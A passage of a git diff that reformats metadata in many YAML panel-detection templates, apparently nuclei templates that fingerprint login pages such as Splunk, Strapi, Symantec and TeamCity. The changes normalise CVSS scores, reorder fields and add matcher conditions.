cb474febe2..27854a2867 100644 --- a/http/exposed-panels/sophos-mobile-panel.yaml +++ b/http/exposed-panels/sophos-mobile-panel.yaml @@ -10,7 +10,7 @@ info: - https://www.sophos.com/en-us/support/downloads/sophos-mobile classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/sophos-web-appliance.yaml b/http/exposed-panels/sophos-web-appliance.yaml index ccfac147af..f78a37858a 100644 --- a/http/exposed-panels/sophos-web-appliance.yaml +++ b/http/exposed-panels/sophos-web-appliance.yaml @@ -7,8 +7,8 @@ info: reference: - https://docs.sophos.com/nsg/swa/help/en-us/nsg/swa/concepts/AboutYourAppliance.html metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: 'http.favicon.hash:-893681401' tags: panel,login,sophos diff --git a/http/exposed-panels/spacelogic-cbus-panel.yaml b/http/exposed-panels/spacelogic-cbus-panel.yaml index 04cbe9818e..b9786cfbb7 100644 --- a/http/exposed-panels/spacelogic-cbus-panel.yaml +++ b/http/exposed-panels/spacelogic-cbus-panel.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"SpaceLogic C-Bus" tags: panel,spacelogic,login diff --git a/http/exposed-panels/spark-panel.yaml b/http/exposed-panels/spark-panel.yaml index 17eae915dc..ed6c2bbdba 100644 --- a/http/exposed-panels/spark-panel.yaml +++ b/http/exposed-panels/spark-panel.yaml @@ -9,11 +9,11 @@ info: - https://www.hypeinnovation.com classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"/apps/IMT/Html/" tags: panel,spark diff --git a/http/exposed-panels/sphider-login.yaml b/http/exposed-panels/sphider-login.yaml index 58412c55bf..1119f5a9df 100644 --- a/http/exposed-panels/sphider-login.yaml +++ b/http/exposed-panels/sphider-login.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/6641 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: edb,panel metadata: max-request: 3 + tags: edb,panel http: - method: GET @@ -23,11 +23,13 @@ http: - '{{BaseURL}}/search/admin/admin.php' stop-at-first-match: true + matchers-condition: and matchers: - type: word words: - 'Sphider Admin Login' + - type: status status: - 200 diff --git a/http/exposed-panels/sphinxonline-panel.yaml b/http/exposed-panels/sphinxonline-panel.yaml index b69d14f47f..92f944ef19 100644 --- a/http/exposed-panels/sphinxonline-panel.yaml +++ b/http/exposed-panels/sphinxonline-panel.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.lesphinx-developpement.fr/ metadata: - max-request: 2 verified: true + max-request: 1 shodan-query: http.title:"Connection - SphinxOnline" tags: panel,sphinxonline,login,detect diff --git a/http/exposed-panels/spiderfoot.yaml b/http/exposed-panels/spiderfoot.yaml index 29aec4cea3..bbdec311d0 100644 --- a/http/exposed-panels/spiderfoot.yaml +++ b/http/exposed-panels/spiderfoot.yaml @@ -7,11 +7,11 @@ info: description: SpiderFoot login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,login,tech,spiderfoot metadata: max-request: 1 + tags: panel,login,tech,spiderfoot http: - method: GET diff --git a/http/exposed-panels/splunk-enterprise-panel.yaml b/http/exposed-panels/splunk-enterprise-panel.yaml index a923bac7d2..9b63862eb0 100644 --- a/http/exposed-panels/splunk-enterprise-panel.yaml +++ b/http/exposed-panels/splunk-enterprise-panel.yaml @@ -9,7 +9,7 @@ info: - https://www.splunk.com/en_us/software/splunk-enterprise.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -22,6 +22,7 @@ http: - '{{BaseURL}}/en-US/account/login' host-redirects: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/splunk-login.yaml b/http/exposed-panels/splunk-login.yaml index af83b60274..ad24aef422 100644 --- a/http/exposed-panels/splunk-login.yaml +++ b/http/exposed-panels/splunk-login.yaml @@ -7,7 +7,7 @@ info: description: Splunk SOAR login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/spotweb-login-panel.yaml b/http/exposed-panels/spotweb-login-panel.yaml index 61803d4aa5..a9ac528d01 100644 --- a/http/exposed-panels/spotweb-login-panel.yaml +++ b/http/exposed-panels/spotweb-login-panel.yaml @@ -5,8 +5,8 @@ info: author: theamanrawat severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"SpotWeb - overview" tags: panel,spotweb,detect @@ -26,4 +26,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/exposed-panels/sql-monitor.yaml b/http/exposed-panels/sql-monitor.yaml index 0962195ef4..98c2246ff6 100644 --- a/http/exposed-panels/sql-monitor.yaml +++ b/http/exposed-panels/sql-monitor.yaml @@ -5,13 +5,13 @@ info: author: dhiyaneshDK severity: info description: SQL Monitor was discovered. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: max-request: 1 shodan-query: html:"SQL Monitor" - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 tags: panel http: @@ -24,6 +24,7 @@ http: - type: word words: - '

JavaScript needs to be enabled for SQL Monitor to work properly.

' + - type: status status: - 200 diff --git a/http/exposed-panels/sqlbuddy-panel.yaml b/http/exposed-panels/sqlbuddy-panel.yaml index 0856b71b1a..6a88516b78 100644 --- a/http/exposed-panels/sqlbuddy-panel.yaml +++ b/http/exposed-panels/sqlbuddy-panel.yaml @@ -10,11 +10,11 @@ info: - http://sqlbuddy.com/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"SQL Buddy" tags: panel,sqlbuddy diff --git a/http/exposed-panels/squirrelmail-login.yaml b/http/exposed-panels/squirrelmail-login.yaml index b9564090ce..5ef82bcb96 100644 --- a/http/exposed-panels/squirrelmail-login.yaml +++ b/http/exposed-panels/squirrelmail-login.yaml @@ -9,7 +9,7 @@ info: - https://www.exploit-db.com/ghdb/7407 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 4 @@ -27,9 +27,9 @@ http: host-redirects: true max-redirects: 2 stop-at-first-match: true + matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/sqwebmail-login-panel.yaml b/http/exposed-panels/sqwebmail-login-panel.yaml index 7dc8d37300..ae098d56da 100644 --- a/http/exposed-panels/sqwebmail-login-panel.yaml +++ b/http/exposed-panels/sqwebmail-login-panel.yaml @@ -7,11 +7,11 @@ info: description: SqWebMail login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"SqWebMail" tags: webmail,sqwebmail,panel @@ -24,9 +24,9 @@ http: host-redirects: true max-redirects: 2 stop-at-first-match: true + matchers-condition: and matchers: - - type: word words: - "SqWebMail - Copyright" diff --git a/http/exposed-panels/star-network-utility.yaml b/http/exposed-panels/star-network-utility.yaml index bfc6359a4f..65e7f09080 100644 --- a/http/exposed-panels/star-network-utility.yaml +++ b/http/exposed-panels/star-network-utility.yaml @@ -7,11 +7,11 @@ info: description: Star Micronics Network Utility panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Network Utility" tags: panel,utility diff --git a/http/exposed-panels/start-element-manager-panel.yaml b/http/exposed-panels/start-element-manager-panel.yaml index 6e169252d9..dc71c283eb 100644 --- a/http/exposed-panels/start-element-manager-panel.yaml +++ b/http/exposed-panels/start-element-manager-panel.yaml @@ -7,11 +7,11 @@ info: description: Start Element Manager panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel metadata: max-request: 1 + tags: panel http: - method: GET diff --git a/http/exposed-panels/steve-login-panel.yaml b/http/exposed-panels/steve-login-panel.yaml index cf93e8679e..f9a225f6e7 100644 --- a/http/exposed-panels/steve-login-panel.yaml +++ b/http/exposed-panels/steve-login-panel.yaml @@ -10,11 +10,11 @@ info: - https://github.com/steve-community/steve classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"SteVe - Steckdosenverwaltung" google-query: intitle:"SteVe - Steckdosenverwaltung" tags: panel,steve @@ -28,6 +28,7 @@ http: stop-at-first-match: true redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/storybook-panel.yaml b/http/exposed-panels/storybook-panel.yaml index 72725dd931..c9771e2f9c 100644 --- a/http/exposed-panels/storybook-panel.yaml +++ b/http/exposed-panels/storybook-panel.yaml @@ -10,11 +10,11 @@ info: - https://github.com/storybookjs/storybook classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"storybook" tags: panel,storybook,workshop @@ -27,6 +27,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/strapi-documentation.yaml b/http/exposed-panels/strapi-documentation.yaml index 22c10a943c..a1a9f34747 100644 --- a/http/exposed-panels/strapi-documentation.yaml +++ b/http/exposed-panels/strapi-documentation.yaml @@ -7,11 +7,11 @@ info: description: Strapi CMS Documentation login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: strapi,panel metadata: max-request: 2 + tags: strapi,panel http: - method: GET @@ -20,9 +20,9 @@ http: - '{{BaseURL}}/documentation/login' stop-at-first-match: true + matchers-condition: and matchers: - - type: word words: - "x-strapi-config" diff --git a/http/exposed-panels/strapi-panel.yaml b/http/exposed-panels/strapi-panel.yaml index 038f79a4bd..c0fa85b373 100644 --- a/http/exposed-panels/strapi-panel.yaml +++ b/http/exposed-panels/strapi-panel.yaml @@ -7,11 +7,11 @@ info: description: Strapi admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,strapi,login metadata: max-request: 1 + tags: panel,strapi,login http: - method: GET @@ -20,7 +20,6 @@ http: matchers-condition: and matchers: - - type: word words: - "Strapi Admin" diff --git a/http/exposed-panels/stridercd-panel.yaml b/http/exposed-panels/stridercd-panel.yaml index dbf7a1162f..4c6bcd8771 100644 --- a/http/exposed-panels/stridercd-panel.yaml +++ b/http/exposed-panels/stridercd-panel.yaml @@ -10,7 +10,7 @@ info: - https://strider-cd.github.io classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/submitty-login.yaml b/http/exposed-panels/submitty-login.yaml index 0b0b91830b..cd289bee62 100644 --- a/http/exposed-panels/submitty-login.yaml +++ b/http/exposed-panels/submitty-login.yaml @@ -5,16 +5,16 @@ info: author: princechaddha severity: info description: Submitty login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://github.com/Submitty/Submitty - https://rcos.io/ - tags: panel,submitty,oss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: max-request: 1 + tags: panel,submitty,oss http: - method: GET diff --git a/http/exposed-panels/subrion-login.yaml b/http/exposed-panels/subrion-login.yaml index 8e8b59f5df..207796d7d3 100644 --- a/http/exposed-panels/subrion-login.yaml +++ b/http/exposed-panels/subrion-login.yaml @@ -7,11 +7,11 @@ info: description: Subrion Admin Panel login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,subrion metadata: max-request: 1 + tags: panel,subrion http: - method: GET @@ -20,6 +20,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/sugarcrm-panel.yaml b/http/exposed-panels/sugarcrm-panel.yaml index fa59c53a35..39d2e569d1 100644 --- a/http/exposed-panels/sugarcrm-panel.yaml +++ b/http/exposed-panels/sugarcrm-panel.yaml @@ -7,7 +7,7 @@ info: description: SugarCRM login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 2 @@ -21,6 +21,7 @@ http: - "{{BaseURL}}/index.php?action=Login&module=Users" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/sunbird-dcim-panel.yaml b/http/exposed-panels/sunbird-dcim-panel.yaml index caa350975f..8503e17414 100644 --- a/http/exposed-panels/sunbird-dcim-panel.yaml +++ b/http/exposed-panels/sunbird-dcim-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.favicon.hash:781922099 - verified: true tags: sunbird,panel,login http: @@ -23,6 +23,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/sungrow-logger1000-detect.yaml b/http/exposed-panels/sungrow-logger1000-detect.yaml index dbc0c57b5d..8562d995fb 100644 --- a/http/exposed-panels/sungrow-logger1000-detect.yaml +++ b/http/exposed-panels/sungrow-logger1000-detect.yaml @@ -9,11 +9,11 @@ info: - https://www.europe-solarstore.com/download/Sungrow/Sungrow-data-logger-1000_1000B-usert-manual.pdf classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:logger html:"htmlWebpackPlugin.options.title" tags: panel,logger1000,sungrow diff --git a/http/exposed-panels/superadmin-ui-panel.yaml b/http/exposed-panels/superadmin-ui-panel.yaml index 1de7c9c55f..4f5f06626b 100644 --- a/http/exposed-panels/superadmin-ui-panel.yaml +++ b/http/exposed-panels/superadmin-ui-panel.yaml @@ -7,11 +7,11 @@ info: description: SuperAdmin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Superadmin UI - 4myhealth" tags: panel,superadmin diff --git a/http/exposed-panels/supermicro-bmc-panel.yaml b/http/exposed-panels/supermicro-bmc-panel.yaml index ce7ee1dd9c..c4a0249952 100644 --- a/http/exposed-panels/supermicro-bmc-panel.yaml +++ b/http/exposed-panels/supermicro-bmc-panel.yaml @@ -11,7 +11,7 @@ info: - https://www.supermicro.com/white_paper/IPMI_white_paper.pdf classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/superset-login.yaml b/http/exposed-panels/superset-login.yaml index 2197d91097..65f9d23d0a 100644 --- a/http/exposed-panels/superset-login.yaml +++ b/http/exposed-panels/superset-login.yaml @@ -7,11 +7,11 @@ info: description: Apache Superset login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.favicon.hash:1582430156 tags: panel,superset @@ -24,6 +24,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/supervpn-panel.yaml b/http/exposed-panels/supervpn-panel.yaml index fadc2fafec..cf68ce3e55 100644 --- a/http/exposed-panels/supervpn-panel.yaml +++ b/http/exposed-panels/supervpn-panel.yaml @@ -7,16 +7,17 @@ info: description: SuperVPN login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel metadata: max-request: 1 + tags: panel http: - method: GET path: - "{{BaseURL}}/admin/login.html" + matchers: - type: word words: diff --git a/http/exposed-panels/symantec/symantec-dlp-login.yaml b/http/exposed-panels/symantec/symantec-dlp-login.yaml index 8ec52ffe09..e3a4b8a3eb 100644 --- a/http/exposed-panels/symantec/symantec-dlp-login.yaml +++ b/http/exposed-panels/symantec/symantec-dlp-login.yaml @@ -7,7 +7,7 @@ info: description: Symantec Data Loss Prevention login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/symantec/symantec-epm-login.yaml b/http/exposed-panels/symantec/symantec-epm-login.yaml index 75f03da19d..85bf981d9d 100644 --- a/http/exposed-panels/symantec/symantec-epm-login.yaml +++ b/http/exposed-panels/symantec/symantec-epm-login.yaml @@ -7,7 +7,7 @@ info: description: Symantec Endpoint Protection Manager login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/symantec/symantec-ewep-login.yaml b/http/exposed-panels/symantec/symantec-ewep-login.yaml index 71bd53e11d..3910ffa4ac 100644 --- a/http/exposed-panels/symantec/symantec-ewep-login.yaml +++ b/http/exposed-panels/symantec/symantec-ewep-login.yaml @@ -7,7 +7,7 @@ info: description: Symantec Encryption Server login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/symantec/symantec-iam-console.yaml b/http/exposed-panels/symantec/symantec-iam-console.yaml index 64412a1773..5bff5ec634 100644 --- a/http/exposed-panels/symantec/symantec-iam-console.yaml +++ b/http/exposed-panels/symantec/symantec-iam-console.yaml @@ -8,9 +8,9 @@ info: Management Console to administrate Symantec Identity Manager environment, authentication is sometimes disabled. reference: - https://techdocs.broadcom.com/us/en/symantec-security-software/identity-security/identity-manager/14-4/configuring/environments-overview/management-console.html - tags: symantec,panel,login metadata: max-request: 1 + tags: symantec,panel,login http: - method: GET diff --git a/http/exposed-panels/symantec/symantec-pgp-global-directory.yaml b/http/exposed-panels/symantec/symantec-pgp-global-directory.yaml index a9d3bd1535..745d7b0bda 100644 --- a/http/exposed-panels/symantec/symantec-pgp-global-directory.yaml +++ b/http/exposed-panels/symantec/symantec-pgp-global-directory.yaml @@ -7,7 +7,7 @@ info: description: Symantec PGP Global Directory panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/symantec/symantec-phishing-panel.yaml b/http/exposed-panels/symantec/symantec-phishing-panel.yaml index 7379a37938..bd352e6f8e 100644 --- a/http/exposed-panels/symantec/symantec-phishing-panel.yaml +++ b/http/exposed-panels/symantec/symantec-phishing-panel.yaml @@ -8,9 +8,8 @@ info: reference: - https://www.broadcom.com/products/cybersecurity/email/phishing-readiness metadata: - max-request: 1 verified: true - + max-request: 1 tags: symantec,panel,login self-contained: true @@ -24,6 +23,7 @@ http: Host: {{company}}.securitytraining.io redirects: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/synapse-mobility-panel.yaml b/http/exposed-panels/synapse-mobility-panel.yaml index 69d4e13d59..bae5927d5c 100644 --- a/http/exposed-panels/synapse-mobility-panel.yaml +++ b/http/exposed-panels/synapse-mobility-panel.yaml @@ -9,7 +9,7 @@ info: - https://synapse.fujifilm.eu/synapse-mobility.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/syncserver-panel.yaml b/http/exposed-panels/syncserver-panel.yaml index 028f288380..d4c3f19ed5 100644 --- a/http/exposed-panels/syncserver-panel.yaml +++ b/http/exposed-panels/syncserver-panel.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Symmetricom SyncServer" tags: panel,login,syncserver,symmetricom,detect diff --git a/http/exposed-panels/syncthru-web-service.yaml b/http/exposed-panels/syncthru-web-service.yaml index 6aedcc3070..ac2993858f 100644 --- a/http/exposed-panels/syncthru-web-service.yaml +++ b/http/exposed-panels/syncthru-web-service.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/7843 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"SyncThru Web Service" tags: edb,panel,syncthru,printer diff --git a/http/exposed-panels/synnefo-admin-panel.yaml b/http/exposed-panels/synnefo-admin-panel.yaml index 6372c88875..2dd01831dc 100644 --- a/http/exposed-panels/synnefo-admin-panel.yaml +++ b/http/exposed-panels/synnefo-admin-panel.yaml @@ -7,11 +7,11 @@ info: description: Synnefo Admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,synnefo metadata: max-request: 1 + tags: panel,synnefo http: - method: GET diff --git a/http/exposed-panels/synology-rackstation-login.yaml b/http/exposed-panels/synology-rackstation-login.yaml index 0c94022c1c..426760b05f 100644 --- a/http/exposed-panels/synology-rackstation-login.yaml +++ b/http/exposed-panels/synology-rackstation-login.yaml @@ -4,9 +4,9 @@ info: name: Synology RackStation Login Detect author: princechaddha severity: info - tags: login,tech,synology,rackstation,panel metadata: max-request: 1 + tags: login,tech,synology,rackstation,panel http: - method: GET @@ -15,6 +15,7 @@ http: host-redirects: true max-redirects: 1 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/synopsys-coverity-panel.yaml b/http/exposed-panels/synopsys-coverity-panel.yaml index b91955a491..dbb951bb9e 100644 --- a/http/exposed-panels/synopsys-coverity-panel.yaml +++ b/http/exposed-panels/synopsys-coverity-panel.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.synopsys.com/software-integrity/security-testing/static-analysis-sast.html metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Coverity" tags: panel,coverity,synopsys @@ -21,6 +21,7 @@ http: host-redirects: true max-redirects: 1 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/sysaid-panel.yaml b/http/exposed-panels/sysaid-panel.yaml index 5bd2173f57..73ce1c675d 100644 --- a/http/exposed-panels/sysaid-panel.yaml +++ b/http/exposed-panels/sysaid-panel.yaml @@ -7,11 +7,11 @@ info: description: SysAid login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,sysaid,helpdesk metadata: max-request: 2 + tags: panel,sysaid,helpdesk http: - method: GET @@ -20,9 +20,9 @@ http: - "{{BaseURL}}/Login.jsp" stop-at-first-match: true + matchers-condition: or matchers: - - type: dsl dsl: - "status_code==200" diff --git a/http/exposed-panels/tableau-panel.yaml b/http/exposed-panels/tableau-panel.yaml index 9d54de2449..316eb0b1bb 100644 --- a/http/exposed-panels/tableau-panel.yaml +++ b/http/exposed-panels/tableau-panel.yaml @@ -7,7 +7,7 @@ info: description: Tableau Python Server panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/tableau-service-manager.yaml b/http/exposed-panels/tableau-service-manager.yaml index 382c5065a8..785befead3 100644 --- a/http/exposed-panels/tableau-service-manager.yaml +++ b/http/exposed-panels/tableau-service-manager.yaml @@ -9,11 +9,11 @@ info: - https://help.tableau.com/current/server/en-us/sign_in_tsm.htm classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Login - Tableau Services Manager" tags: panel,tableau diff --git a/http/exposed-panels/teamcity-login-panel.yaml b/http/exposed-panels/teamcity-login-panel.yaml index 761b25bd25..7357f341a8 100644 --- a/http/exposed-panels/teamcity-login-panel.yaml +++ b/http/exposed-panels/teamcity-login-panel.yaml @@ -7,11 +7,11 @@ info: description: TeamCity login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.component:"TeamCity" tags: panel,teamcity,jetbrains @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/teampass-panel.yaml b/http/exposed-panels/teampass-panel.yaml index 34bbaed976..5aabb63fd8 100644 --- a/http/exposed-panels/teampass-panel.yaml +++ b/http/exposed-panels/teampass-panel.yaml @@ -7,11 +7,11 @@ info: description: TeamPass panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.html:"teampass" tags: panel,teampass @@ -24,6 +24,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: regex diff --git a/http/exposed-panels/tectuus-scada-monitor.yaml b/http/exposed-panels/tectuus-scada-monitor.yaml index 56b0d3d288..59cd752678 100644 --- a/http/exposed-panels/tectuus-scada-monitor.yaml +++ b/http/exposed-panels/tectuus-scada-monitor.yaml @@ -9,11 +9,11 @@ info: - https://www.tectuus.mx/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,tectuus,scada metadata: max-request: 1 + tags: panel,tectuus,scada http: - method: GET diff --git a/http/exposed-panels/tekton-dashboard.yaml b/http/exposed-panels/tekton-dashboard.yaml index e133f8d3ba..98dbaca786 100644 --- a/http/exposed-panels/tekton-dashboard.yaml +++ b/http/exposed-panels/tekton-dashboard.yaml @@ -7,11 +7,11 @@ info: description: Tekton Dashboard panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Tekton" tags: panel,tekton,exposure diff --git a/http/exposed-panels/telerik-server-login.yaml b/http/exposed-panels/telerik-server-login.yaml index 6524336ced..06a3d2efba 100644 --- 